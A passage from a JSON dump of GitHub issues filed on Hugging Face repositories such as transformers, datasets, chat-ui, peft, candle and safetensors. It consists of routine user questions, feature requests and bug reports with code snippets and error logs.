would be good is to allow input of masks in the SAM image processor. For example, the [Segformer image processor](https://github.com/huggingface/transformers/blob/v4.35.0/src/transformers/models/segformer/image_processing_segformer.py#L305) takes images and masks as inputs and resizes both to the size expected by the Segformer model. \r\n\r\nI have also seen there is a 'post_process_mask' method in the SAM image processor but I am unsure how to implement this in the tutorial I'm following. If you think this is a better way vs. what I am suggesting then please could you explain where I would add this in the code from the tutorial notebook.\n\n### Motivation\n\nEasier fine tuning of SAM model.\n\n### Your contribution\n\nI could try write a PR for this and/or make a PR to update the [notebook](https://github.com/NielsRogge/Transformers-Tutorials/blob/master/SAM/Fine_tune_SAM_(segment_anything)_on_a_custom_dataset.ipynb) instead .", "url": "https://github.com/huggingface/transformers/issues/27361", "state": "closed", "labels": [ "Feature request", "Vision" ], "created_at": "2023-11-08T11:53:31Z", "updated_at": "2024-01-08T16:40:38Z", "user": "rwood-97" }, { "repo": "huggingface/chat-ui", "number": 546, "title": "Custom Theme", "body": "I want to change the UI layout yet still be able to update the code in order to enjoy the new features as they are released.\r\nIs there a way to add my changes in a way that would be similar to a theme? or an outside addon?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/546", "state": "closed", "labels": [], "created_at": "2023-11-08T08:26:43Z", "updated_at": "2023-11-15T09:32:22Z", "comments": 2, "user": "kaplanyaniv" }, { "repo": "huggingface/datasets", "number": 6388, "title": "How to create 3d medical imgae dataset?", "body": "### Feature request\r\n\r\nI am newer to huggingface, after i look up `datasets` docs, I can't find how to create the dataset contains 3d medical image (ends with '.mhd', '.dcm', '.nii')\r\n\r\n### Motivation\r\n\r\nhelp us to upload 3d medical dataset to huggingface!\r\n\r\n### Your contribution\r\n\r\nI'll submit a PR if I find a way to add this feature", "url": "https://github.com/huggingface/datasets/issues/6388", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-11-07T11:27:36Z", "updated_at": "2023-11-07T11:28:53Z", "user": "QingYunA" }, { "repo": "huggingface/datasets", "number": 6387, "title": "How to load existing downloaded dataset ?", "body": "Hi @mariosasko @lhoestq @katielink \r\n\r\nThanks for your contribution and hard work.\r\n\r\n### Feature request\r\n\r\nFirst, I download a dataset as normal by:\r\n```\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset('username/data_name', cache_dir='data')\r\n```\r\n\r\nThe dataset format in `data` directory will be:\r\n```\r\n-data\r\n |-data_name\r\n |-test-00000-of-00001-bf4c733542e35fcb.parquet\r\n |-train-00000-of-00001-2a1df75c6bce91ab.parquet\r\n```\r\n\r\n\r\nThen I use SCP to clone this dataset into another machine, and then try:\r\n```\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset('data/data_name') # load from local path\r\n```\r\n\r\nThis leads to re-generating training and validation split for each time, and the disk quota will be duplicated occupation.\r\n\r\nHow can I just load the dataset without generating and saving these splits again?\r\n\r\n### Motivation\r\n\r\nI do not want to download the same dataset in two machines, scp is much faster and better than HuggingFace API. I hope we can directly load the downloaded datasets (.parquest)\r\n\r\n### Your contribution\r\n\r\nPlease refer to the feature", "url": "https://github.com/huggingface/datasets/issues/6387", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-06T22:51:44Z", "updated_at": "2023-11-16T18:07:01Z", "user": "liming-ai" }, { "repo": "huggingface/gsplat.js", "number": 15, "title": "Does it work with polycam models?", "body": "Hello! Thank you for your work, it looks very promising. Got it working with the README file... Just tried it with a .ply object out of polycam and got error\r\n\r\n```\r\nUncaught (in promise) RangeError: byte length of Float32Array should be a multiple of 4\r\n at new Float32Array ()\r\n at R.setData (Scene.ts:43:25)\r\n at W.LoadAsync (Loader.ts:31:15)\r\n at async main (main.ts:11:5)\r\n\r\n```\r\n\r\nwith what file type is it compatible? Thanks!", "url": "https://github.com/huggingface/gsplat.js/issues/15", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-06T21:15:51Z", "updated_at": "2023-11-10T18:26:55Z", "user": "karen-pal" }, { "repo": "huggingface/chat-ui", "number": 545, "title": "Chat-UI throws an 403 forbidden when access settings", "body": "When viewing the settings page after first setup the settings page fives the error: ```Failed to load resource: the server responded with a status of 403 (Forbidden) settings:1``` in the console. Without any explanation of what and why.\r\n\r\nSetup:\r\n```yaml\r\nservices:\r\n # Chat ui webserver\r\n chat-ui:\r\n container_name: chat\r\n build:\r\n context: ./\r\n dockerfile: Dockerfile\r\n ports:\r\n - 8080:3000\r\n networks:\r\n default:\r\n ipv4_address: 172.25.0.2\r\n\r\n # Mongo database \r\n database:\r\n container_name: mongo-chatui\r\n image: \"mongo:latest\"\r\n ports:\r\n - 27017:27017\r\n restart: always\r\n environment:\r\n - MONGO_INITDB_DATABASE=chat-ui\r\n networks:\r\n default:\r\n ipv4_address: 172.25.0.3\r\n\r\nnetworks:\r\n default:\r\n driver: bridge\r\n ipam:\r\n driver: default\r\n config:\r\n - subnet: 172.25.0.0/28\r\n gateway: 172.25.0.1\r\n```\r\n\r\nAnd my .env.local: \r\n```\r\nMONGODB_URL=mongodb://172.25.0.3:27017\r\nPUBLIC_ORIGIN=http://localhost:3030\r\nHF_ACCESS_TOKEN=recacted\r\nMODELS=recated\r\n```\r\n\r\nWhat are the steps to take here? \r\n\r\nThe database connections gets accepted according to the mongoDB instance", "url": "https://github.com/huggingface/chat-ui/issues/545", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-06T15:09:33Z", "updated_at": "2024-02-15T21:03:04Z", "comments": 5, "user": "IT-Guy007" }, { "repo": "huggingface/alignment-handbook", "number": 9, "title": "How to finetune or lora on custom dataset", "body": "How to finetune or lora on custom dataset", "url": "https://github.com/huggingface/alignment-handbook/issues/9", "state": "open", "labels": [], "created_at": "2023-11-05T02:38:33Z", "updated_at": "2024-11-11T07:52:57Z", "user": "universewill" }, { "repo": "huggingface/peft", "number": 1080, "title": "Add docs on how to merge adapters after 4bit QLoRA with PEFT 0.6", "body": "### Feature request\r\n\r\nthere has been some controversy on how to correctly **merge the adapters with the base model after 4bit LoRA** training. \r\n\r\nto me it seems there are two ways to merge and save:\r\n\r\n- ChrisHayduk https://gist.github.com/ChrisHayduk/1a53463331f52dca205e55982baf9930\r\n- TheBloke https://github.com/TheBlokeAI/AIScripts/blob/main/merge_peft_adapters.py\r\n\r\nWhat is the correct way to merge the adapters now (with PEFT 0.6 and [PR 851](https://github.com/huggingface/peft/pull/851) merged) after training a 4-bit quantized model ?\r\n\r\n### Motivation\r\n\r\nno docs, at least i haven't found any\r\n\r\n### Your contribution\r\n\r\nexample:\r\n\r\n**quantize and train**\r\n```\r\nmodelpath=\"models/Mistral-7B-v0.1\"\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n modelpath, \r\n load_in_4bit=True,\r\n quantization_config=BitsAndBytesConfig(\r\n load_in_4bit=True,\r\n llm_int8_threshold=6.0,\r\n llm_int8_has_fp16_weight=False,\r\n bnb_4bit_compute_dtype=torch.bfloat16,\r\n bnb_4bit_use_double_quant=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n ),\r\n torch_dtype=torch.bfloat16,\r\n)\r\n\r\nmodel = prepare_model_for_kbit_training(model)\r\nconfig = LoraConfig(\r\n r=64, \r\n lora_alpha=16, \r\n target_modules =\r\n ['q_proj', \r\n 'k_proj', \r\n 'down_proj', \r\n 'v_proj', \r\n 'gate_proj', \r\n 'o_proj', \r\n 'up_proj'],\r\n lora_dropout=0.1, \r\n bias=\"none\", \r\n task_type=\"CAUSAL_LM\"\r\n)\r\nmodel = get_peft_model(model, config)\r\n\r\ntrain ...\r\n```\r\n\r\n**merge and save** \r\n```\r\nbase_model = AutoModelForCausalLM.from_pretrained(\r\n \"models/Mistral-7B-v0.1\",\r\n return_dict=True,\r\n torch_dtype=torch.bfloat16,\r\n)\r\n\r\nmodel = PeftModel.from_pretrained(base_model, \"some-checkpoint\")\r\nmodel = model.merge_and_unload()\r\n\r\nmodel.save_pretrained(args.out, safe_serialization=True)\r\n```\r\n\r\nis this the proper way to do it? if yes/no, it would be nice to have this documented somwhere! \ud83e\udd17\r\n ", "url": "https://github.com/huggingface/peft/issues/1080", "state": "closed", "labels": [], "created_at": "2023-11-04T10:07:16Z", "updated_at": "2023-11-17T22:22:06Z", "user": "geronimi73" }, { "repo": "huggingface/huggingface_hub", "number": 1801, "title": "Entire operation get cancelled when 1 file fails when using api.upload_folder - how to make it iterative", "body": "I am using below code. Uploaded like 80 GB file and the entire operation failed just because of 1 png failed to upload for some reason\r\n\r\nI see uploaded repo has 0 changes\r\n\r\nHow can I make it iterative? So after each file upload it is committed to the repo\r\n\r\nI don't need commit or file history. Just upload newer files and overwrite if newer\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\n\r\n# Upload all the content from the local folder to your remote Space.\r\n# By default, files are uploaded at the root of the repo\r\napi.upload_folder(\r\n folder_path=\"/workspace/path\",\r\n repo_id=\"username/repo\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\n### Reproduction\r\n\r\n_No response_\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System info\r\n\r\n```shell\r\n- huggingface_hub version: 0.16.4\r\n- Platform: Linux-5.15.0-86-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /root/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: ME\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.0.1+cu118\r\n- Jinja2: 3.1.2\r\n- Graphviz: N/A\r\n- Pydot: N/A\r\n- Pillow: 9.5.0\r\n- hf_transfer: N/A\r\n- gradio: 3.41.2\r\n- tensorboard: N/A\r\n- numpy: 1.23.5\r\n- pydantic: 1.10.12\r\n- aiohttp: 3.8.5\r\n- ENDPOINT: https://huggingface.co\r\n- HUGGINGFACE_HUB_CACHE: /root/.cache/huggingface/hub\r\n- HUGGINGFACE_ASSETS_CACHE: /root/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /root/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\r\n```\r\n", "url": "https://github.com/huggingface/huggingface_hub/issues/1801", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-04T00:20:00Z", "updated_at": "2023-11-26T09:09:35Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers.js", "number": 378, "title": "Security issue - content security policy - script unsafe-eval", "body": "Context:\r\nI use @xenova/transformers 2.6.2 npm package from a web application to do image classifcations. Here is the gist of my setup:\r\n\r\n```js\r\nconst modelPath = 'own-domain/models-and-wasm/'\r\n\r\nenv.localModelPath = \"/\";\r\nenv.useBrowserCache = true;\r\nenv.backends.onnx.wasm.wasmPaths = modelPath;\r\n\r\nconst classifier = await pipeline(\"image-classification\", modelPath, { quantized: true });\r\nconst output = await classifier(imagePath, { topk: 5 });\r\n```\r\n\r\nEverything works code-wise but when I remove unsafe-inline in CSP, it fails with this warning in the browser console:\r\n\r\n```js\r\nFailed to asynchronously prepare wasm: \r\nCompileError: WebAssembly.instantiate(): Refused to compile or instantiate WebAssembly module because 'unsafe-eval' is not an allowed source of script in the following Content Security Policy directive\r\n```\r\n\r\nI **cannot** allow script-src: unsafe-eval in my web application (corporate rules). Do I have any alternatives? ", "url": "https://github.com/huggingface/transformers.js/issues/378", "state": "open", "labels": [ "question" ], "created_at": "2023-11-03T13:50:30Z", "updated_at": "2023-11-06T13:44:57Z", "user": "stiano" }, { "repo": "huggingface/diffusers", "number": 5643, "title": "How to use the ip adapter controlnet?", "body": "Hi, I can't use this specific controlnet because it's from here: https://huggingface.co/lllyasviel/sd_control_collection/tree/main\r\n\r\nand the format doesn't allow from_pretrained. When I use from_single_file, I get:\r\n```\r\n\r\nstable_diffusion/convert_from_ckpt.py\", line 422, in convert_ldm_unet_checkpoint\r\n new_checkpoint[\"time_embedding.linear_1.weight\"] = unet_state_dict[\"time_embed.0.weight\"]\r\nKeyError: 'time_embed.0.weight'\r\n```\r\nI used this to get the error:\r\n`ControlNetModel.from_single_file(\"./ip-adapter_sd15_plus.pth\", torch_dtype=torch.float32,local_files_only=True).to('cuda')`\r\n\r\na similar error was raised and the response was: \"just don't use from_single_file\" https://github.com/huggingface/diffusers/issues/5577", "url": "https://github.com/huggingface/diffusers/issues/5643", "state": "closed", "labels": [], "created_at": "2023-11-03T13:34:44Z", "updated_at": "2023-11-13T15:12:29Z", "user": "alexblattner" }, { "repo": "huggingface/dataset-viewer", "number": 2050, "title": "Should we support video datasets?", "body": "Like https://huggingface.co/datasets/commaai/commavq\r\n\r\nThere was a previous intent in datasets: https://github.com/huggingface/datasets/pull/5339", "url": "https://github.com/huggingface/dataset-viewer/issues/2050", "state": "closed", "labels": [ "question", "feature request" ], "created_at": "2023-11-03T13:33:00Z", "updated_at": "2023-12-11T15:04:08Z", "user": "severo" }, { "repo": "huggingface/distil-whisper", "number": 16, "title": "How to use ONNX model?", "body": "Hello there,\r\n\r\nI'm interested in using the ONNX model, as I saw that you are providing the weights for it.\r\nI tried to use it with `optimum` library, but didn't manage to make it work.\r\nCould someone indicate in which direction I should look into?\r\n\r\nThank you so much for this repository and the work you put into it. It really helps!!\r\n\r\n### Note:\r\n\r\n here is what I tried\r\n\r\n```\r\nfrom transformers import AutoModelForSpeechSeq2Seq, AutoProcessor\r\nimport torch\r\nfrom optimum.onnxruntime import ORTModelForSpeechSeq2Seq\r\n\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\ntorch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32\r\n\r\nmodel_id = \"distil-whisper/distil-large-v2\"\r\n\r\nmodel = ORTModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, torch_dtype=torch_dtype, encoder_file_name=f\"encoder_model.onnx\"\r\n)\r\n```\r\n\r\nHere is the error:\r\n```\r\nRuntimeError: Too many ONNX model files were found in distil-whisper/distil-large-v2, specify which one to load by using the encoder_file_name argument.\r\n```", "url": "https://github.com/huggingface/distil-whisper/issues/16", "state": "open", "labels": [], "created_at": "2023-11-03T11:51:44Z", "updated_at": "2023-11-07T07:36:50Z", "user": "H-G-11" }, { "repo": "huggingface/dataset-viewer", "number": 2049, "title": "Retry jobs that finish with `ClientConnection` error?", "body": "Maybe here: https://github.com/huggingface/datasets-server/blob/f311a9212aaa91dd0373e5c2d4f5da9b6bdabcb5/chart/env/prod.yaml#L209\r\n\r\nInternal conversation on Slack: https://huggingface.slack.com/archives/C0311GZ7R6K/p1698224875005729\r\n\r\nAnyway: I'm wondering if we can have the error now that the dataset scripts are disabled by default.", "url": "https://github.com/huggingface/dataset-viewer/issues/2049", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2023-11-03T11:28:19Z", "updated_at": "2024-02-06T17:29:45Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 377, "title": "GPU Acceleration to increase performance", "body": "Do we have any option to use GPU to increase performance of model loading and detection?\r\nAs currently in Object Detection it's taking around 10 seconds. If we want to do this on GPU, can we do that?\r\n\r\nRunning below lines through web worker, increases overall UI experience but not increases any performance.\r\n```\r\nconst model = await pipeline(\"object-detection\", \"Xenova/detr-resnet-50\");\r\nconst result = await model(img, { threshold: 0.9 });\r\n```\r\n\r\nCan we use GPU for that?", "url": "https://github.com/huggingface/transformers.js/issues/377", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-03T07:44:05Z", "updated_at": "2024-10-18T13:30:08Z", "user": "milind-yadav" }, { "repo": "huggingface/distil-whisper", "number": 11, "title": "[Speculative Decoding] How to run speculative decoding for batch_size > 1? ", "body": "Transformers 4.35 only supports speculative decoding for batch size == 1. In order to use speculative decoding for batch size > 1, please make sure to use this branch: https://github.com/huggingface/transformers/pull/26875\r\n\r\nTo do so, you need to install transformers as follows:\r\n\r\n```\r\npip install git+https://github.com/huggingface/transformers.git@assistant_decoding_batch\r\n```\r\n\r\nand then you can run:\r\n\r\n```py\r\nfrom transformers import pipeline, AutoModelForCausalLM, AutoModelForSpeechSeq2Seq, AutoProcessor\r\nimport torch\r\nfrom datasets import load_dataset\r\n\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\ntorch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32\r\n\r\nassistant_model_id = \"distil-whisper/distil-large-v2\"\r\n\r\nassistant_model = AutoModelForCausalLM.from_pretrained(\r\n assistant_model_id, torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True\r\n)\r\nassistant_model.to(device)\r\n\r\nmodel_id = \"openai/whisper-large-v2\"\r\n\r\nmodel = AutoModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True\r\n)\r\nmodel.to(device)\r\n\r\nprocessor = AutoProcessor.from_pretrained(model_id)\r\n\r\npipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model,\r\n tokenizer=processor.tokenizer,\r\n feature_extractor=processor.feature_extractor,\r\n max_new_tokens=128,\r\n generate_kwargs={\"assistant_model\": assistant_model},\r\n torch_dtype=torch_dtype,\r\n chunk_length_s=15,\r\n batch_size=4,\r\n device=device,\r\n)\r\n\r\ndataset = load_dataset(\"distil-whisper/librispeech_long\", \"default\", split=\"validation\")\r\nsample = dataset[0][\"audio\"]\r\n\r\nresult = pipe(sample)\r\nprint(result[\"text\"])\r\n```\r\n\r\nThe PR will be merged to Transformers soon.\r\n\r\n**Note**: Given the \"speculative\" nature of assistant decoding (*a.k.a* speculative decoding), it is not recommended to make use of speculative decoding for batch sizes higher than 4 as this might actually lead to the transcription pipeline being slower compared to just using the teacher model. \r\nConfer with Table 22 of [the paper](https://arxiv.org/pdf/2311.00430.pdf).", "url": "https://github.com/huggingface/distil-whisper/issues/11", "state": "open", "labels": [], "created_at": "2023-11-02T14:19:55Z", "updated_at": "2024-10-03T13:12:22Z", "user": "patrickvonplaten" }, { "repo": "huggingface/chat-ui", "number": 542, "title": "Request: more clarity on JSON response from custom models", "body": "Note: duplicate from https://huggingface.co/spaces/huggingchat/chat-ui/discussions/309, not sure which is the proper place to post.\r\n\r\nI followed the guide chat-ui to deploy a version in gcp, and I love the chat interface.\r\n\r\nI would love to hook it up to one of my custom models, so I specified\r\n```\r\n\"endpoints\": [{\"url\": \"[http://127.0.0.1:8000\"}]](http://127.0.0.1:8000\"%7D%5D/)\r\n}\r\n]`\r\n\r\n```\r\nfor MODELS as suggested.\r\n\r\nI receive the message that has been posted in the web interface at my endpoint, but I am unable to send back the proper json response. So far, in python, I do:\r\n```\r\nresponse_content = [\r\n{\r\n\"generated_text\": \"Please show this response.\"\r\n}\r\n]\r\nresponse = make_response(jsonify(response_content))\r\nreturn response\r\n```\r\n\r\nIt is received in the chat-ui code (confirmed by injecting console.log statements), but it doesn't show in the browser conversation.\r\n\r\nCan someone please clarify what json (content, headers, whatever is needed) I need to send from my custom model endpoint as a response to the chat-ui interface? Or if this is the wrong place to ask, tell me where I should ask?", "url": "https://github.com/huggingface/chat-ui/issues/542", "state": "open", "labels": [ "support" ], "created_at": "2023-11-02T10:31:53Z", "updated_at": "2023-11-03T19:44:02Z", "comments": 1, "user": "thubreg" }, { "repo": "huggingface/distil-whisper", "number": 8, "title": "Where is the model?", "body": "Link to HF leads to empty files section.", "url": "https://github.com/huggingface/distil-whisper/issues/8", "state": "closed", "labels": [], "created_at": "2023-11-02T08:47:23Z", "updated_at": "2023-11-02T17:31:08Z", "user": "lkmdhertg" }, { "repo": "huggingface/candle", "number": 1241, "title": "How to reduce memory usage of backpropagation?", "body": "I implemented the [tiny NeRF example](https://github.com/bmild/nerf/blob/master/tiny_nerf.ipynb) using `candle` here: https://github.com/laptou/nerfy/blob/fc50dbd61c4012d1f12f556a72474b59a8b3c158/examples/tiny_nerf.rs\r\n\r\nThe example, which is written using TensorFlow, runs fine on my laptop. My `candle` implementation consumes all available memory on my laptop, which crashes my desktop session if I use CPU and errors out with a CUDA memory allocation error if I use the GPU. I'm running on a laptop with 32 GB of RAM, 32 GB of swap, and an RTX A3000 w/ 12 GB of VRAM. \r\n\r\nI'm barely able to run it on CPU if I decrease the hidden layer size from 256 to 64.\r\n\r\n![image](https://github.com/huggingface/candle/assets/14832331/683d4361-9ccb-4f04-939e-67e0f3ba0414)\r\n\r\nI tracked the memory allocations using `heaptrack`, and it seems like most of them are related to keeping track of the operations for backpropagation. \r\n\r\nCan you spot any obvious issues in my implementation that are causing it to consume so much memory? Is there a way that I can disable or reduce this behavior in some parts of the code to reduce the amount of memory that it uses?", "url": "https://github.com/huggingface/candle/issues/1241", "state": "open", "labels": [], "created_at": "2023-11-02T03:38:32Z", "updated_at": "2025-09-10T05:14:01Z", "user": "laptou" }, { "repo": "huggingface/candle", "number": 1240, "title": "Demo showing how to load in candle computer vision model using webcam", "body": "```\r\nuse anyhow::Result; // Automatically handle the error types\r\nuse opencv::{\r\n prelude::*,\r\n videoio,\r\n highgui\r\n}; // Note, the namespace of OpenCV is changed (to better or worse). It is no longer one enormous.\r\nfn main() -> Result<()> { // Note, this is anyhow::Result\r\n // Open a GUI window\r\n highgui::named_window(\"window\", highgui::WINDOW_FULLSCREEN)?;\r\n // Open the web-camera (assuming you have one)\r\n let mut cam = videoio::VideoCapture::new(0, videoio::CAP_ANY)?;\r\n let mut frame = Mat::default(); // This array will store the web-cam data\r\n // Read the camera\r\n // and display in the window\r\n loop {\r\n cam.read(&mut frame)?;\r\n highgui::imshow(\"window\", &frame)?;\r\n let key = highgui::wait_key(1)?;\r\n if key == 113 { // quit with q\r\n break;\r\n }\r\n }\r\n Ok(())\r\n\r\n\r\n\r\n}\r\n\r\n```\r\n\r\nHere is a basic example of opening Qt using Opencv-rust.\r\nIt would be great to have a working example using this alongside candle!\r\nOpen to submitting this as a pr in any of the example folders.", "url": "https://github.com/huggingface/candle/issues/1240", "state": "open", "labels": [], "created_at": "2023-11-02T03:38:19Z", "updated_at": "2023-11-02T06:24:11Z", "user": "bazylhorsey" }, { "repo": "huggingface/candle", "number": 1239, "title": "How inference on a new model, have to hand written model.rs manually?", "body": "Just wonder if there scripts convert a pth or onnx to candle format maybe?", "url": "https://github.com/huggingface/candle/issues/1239", "state": "closed", "labels": [], "created_at": "2023-11-02T03:32:11Z", "updated_at": "2023-11-02T07:03:54Z", "user": "lucasjinreal" }, { "repo": "huggingface/safetensors", "number": 375, "title": "How do I load the tensors in Rust? ", "body": "Hi, \r\n\r\nI am unable to find good documentation to read the weights in rust. I want to write gpt2 from scratch, and want to be able to load the HF weights. Since, I only plan to use the ndarray library, I want to be able to load the FP32 tensors somehow. Please help. \r\n\r\nIn python I do:\r\n```python\r\n# Load model directly\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nimport safetensors\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"gpt2\")\r\nmodel = AutoModelForCausalLM.from_pretrained(\"gpt2\")\r\nsafetensors.torch.save_model(model, 'gpt2_weights.st')\r\n```\r\n\r\nI want to use some code like this in rust (which is currently incorrect because safetensors doesn't have a Reader) and I am unable to figure out the API.\r\n```rust\r\nuse safetensors::Reader;\r\nuse std::error::Error;\r\n\r\nfn main() -> Result<(), Box> {\r\n let reader = Reader::from_file(\"gpt2_weights.st\")?;\r\n\r\n for (name, tensor) in reader.tensors() {\r\n println!(\"Tensor name: {}\", name);\r\n let tensor = tensor?;\r\n println!(\"Shape: {:?}\", tensor.shape()); \r\n }\r\n\r\n Ok(())\r\n}\r\n```", "url": "https://github.com/huggingface/safetensors/issues/375", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-02T02:11:11Z", "updated_at": "2024-01-02T01:48:31Z", "comments": 5, "user": "arunpatro" }, { "repo": "huggingface/safetensors", "number": 374, "title": "safetensor.*.save_file the parameter name to set the incoming tensors change from \"tensors\" to \"tensor_dict\"", "body": "### Feature request\r\n\r\nIn Jax, torch, and paddle is:\r\n\r\n> tensors (Dict[str, torch.Tensor]) \u2014 The incoming tensors. Tensors need to be contiguous and dense.\r\n\r\nCheck: https://huggingface.co/docs/safetensors/api/torch#safetensors.torch.save\r\n\r\nIn Numpy:\r\n\r\n> tensor_dict (Dict[str, np.ndarray]) \u2014 The incoming tensors. Tensors need to be contiguous and dense.\r\n\r\nCheck: https://huggingface.co/docs/safetensors/api/numpy#safetensors.numpy.save_file\r\n\r\nIs there a reason to change the name between frameworks?\r\n\r\n### Motivation\r\n\r\nImprove the documentation.\r\n\r\n### Your contribution\r\n\r\nI can submit a PR if that helps!", "url": "https://github.com/huggingface/safetensors/issues/374", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-02T00:41:14Z", "updated_at": "2024-01-02T01:48:32Z", "comments": 2, "user": "csaybar" }, { "repo": "huggingface/safetensors", "number": 373, "title": "Stream load models (load model larger than system memory)", "body": "### Feature request\r\n\r\nI'm not very familiar with the details, but I'd like to load a 20GB model while having only 8 GB system memory.\r\n\r\nCurrently, safetensors loads the entire model into system memory.\r\nIs it possible to load models incrementally/as a stream?\r\n\r\nRelated:\r\nhttps://github.com/turboderp/exllama/issues/245\r\nhttps://github.com/huggingface/safetensors/issues/67\r\n\r\nPossibly related (writing is different from reading):\r\nhttps://github.com/huggingface/safetensors/issues/291\r\n\r\n### Motivation\r\n\r\nUsing swap requires unnecessary wear on SSDs. And it's silly to read a model from disk, just to write it back to disk as a swap, and then read it again from disk.\r\n\r\nAlternatively, the model should be saved in a format that can be streamed directly to memory?\r\n\r\nSimilarly, it's silly to require X amount of system memory to be available for just a few seconds while loading a large model.\r\n\r\n### Your contribution\r\n\r\nUnqualified to contribute.", "url": "https://github.com/huggingface/safetensors/issues/373", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-01T16:14:18Z", "updated_at": "2024-01-03T01:48:07Z", "comments": 6, "user": "erikschul" }, { "repo": "huggingface/text-embeddings-inference", "number": 59, "title": "how to resolve this compile error?", "body": "### System Info\n\ncargo 1.73.0 (9c4383fb5 2023-08-26)\r\ngcc (GCC) 9.3.1 20200408 (Red Hat 9.3.1-2)\r\ncuda 11.8\r\nv100\r\n\r\n\r\n```\r\n\"-Wl,-Bdynamic\" \"-llayernorm\" \"-lcudart\" \"-lstdc++\" \"-lcuda\" \"-lnvrtc\" \"-lcurand\" \"-lcublas\" \"-lcublasLt\" \"-lssl\" \"-lcrypto\" \"-lgcc_s\" \"-lutil\" \"-lrt\" \"-lpthread\" \"-lm\" \"-ldl\" \"-lc\" \"-Wl,--eh-frame-hdr\" \"-Wl,-z,noexecstack\" \"-L\" \"/home/luoweichao/.rustup/toolchains/1.73.0-x86_64-unknown-linux-gnu/lib/rustlib/x86_64-unknown-linux-gnu/lib\" \"-o\" \"/home/luoweichao/text-embeddings-inference/target/release/deps/text_embeddings_router-0345b2604448f561\" \"-Wl,--gc-sections\" \"-pie\" \"-Wl,-z,relro,-z,now\" \"-Wl,-O1\" \"-nodefaultlibs\"\r\n = note: /opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/ld: /home/luoweichao/text-embeddings-inference/target/release/build/candle-layer-norm-3b4dbfa3d047ac72/out/liblayernorm.a(ln_api.o): relocation R_X86_64_32 against `.rodata.str1.1' can not be used when making a PIE object; recompile with -fPIC\r\n /opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/ld: final link failed: nonrepresentable section on output\r\n collect2: error: ld returned 1 exit status\r\n \r\n\r\nerror: could not compile `text-embeddings-router` (bin \"text-embeddings-router\") due to previous error\r\nerror: failed to compile `text-embeddings-router v0.3.0 (/home/luoweichao/text-embeddings-inference/router)`, intermediate artifacts can be found at `/home/luoweichao/text-embeddings-inference/target`.\r\n```\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\ncargo install --path router -F candle-cuda-volta --no-default-features\n\n### Expected behavior\n\nbuild successfully!", "url": "https://github.com/huggingface/text-embeddings-inference/issues/59", "state": "closed", "labels": [], "created_at": "2023-10-31T11:35:02Z", "updated_at": "2023-11-02T07:52:18Z", "user": "kingder" }, { "repo": "huggingface/optimum", "number": 1497, "title": "about LCM onnx model", "body": "Hi!\r\n\r\ncan someone please tell how we can use the LCM model in onnx? i see u guys made an script to run it in onnx, but what about the model? can we simply use the normal stable diffusion script onnx conversation for lcm model too? or we have to wait someone make an conversation script?\r\n\r\nor could someone upload onnx converted of LCM model on huggingface and share it with us please?\r\n\r\nkind regards\r\n\r\n\r\n\r\n### Who can help?\r\n\r\n@echarlaix \r\n\r\n", "url": "https://github.com/huggingface/optimum/issues/1497", "state": "closed", "labels": [ "bug" ], "created_at": "2023-10-31T08:57:16Z", "updated_at": "2024-01-04T14:21:54Z", "comments": 6, "user": "Amin456789" }, { "repo": "huggingface/dataset-viewer", "number": 2038, "title": "How to pass single quote in /filter endpoint \"where\" parameter?", "body": "See `https://huggingface.co/datasets/albertvillanova/lm_en_dummy2/viewer/default/train?f[meta][value]='{'file': 'file_4.txt'}'`\r\n\r\nFrom `https://datasets-server.huggingface.co/filter?dataset=albertvillanova/lm_en_dummy2&config=default&split=train&where=meta='{'file': 'file_4.txt'}'`, we get:\r\n\r\n```\r\n{\"error\":\"Parameter 'where' is invalid\"}\r\n```\r\n\r\nWe want to search he value 